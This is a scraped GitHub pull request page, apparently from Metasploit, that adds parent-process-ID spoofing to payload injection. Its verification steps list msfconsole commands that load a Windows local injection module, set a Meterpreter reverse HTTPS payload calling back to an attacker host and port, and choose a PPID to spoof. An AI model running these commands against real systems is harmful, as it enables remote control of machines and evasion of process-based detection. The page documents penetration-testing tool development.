-
Notifications
You must be signed in to change notification settings - Fork 14.3k
Add support for PPID spoofing #12736
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
I had some time to play with this today.... it is a neat feature, but it is prickly. |
@bwatters-r7 yes, some processes are different from others. i have tested it with |
Update Payload Gem and add docs
Release NotesThis PR adds functionality to the process library and the |
will fix rapid7/metasploit-payloads#373
requires rapid7/metasploit-payloads#374
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_https
set lhost ...
set lport ...
set PPID ...
(PPID to spoof for new agent)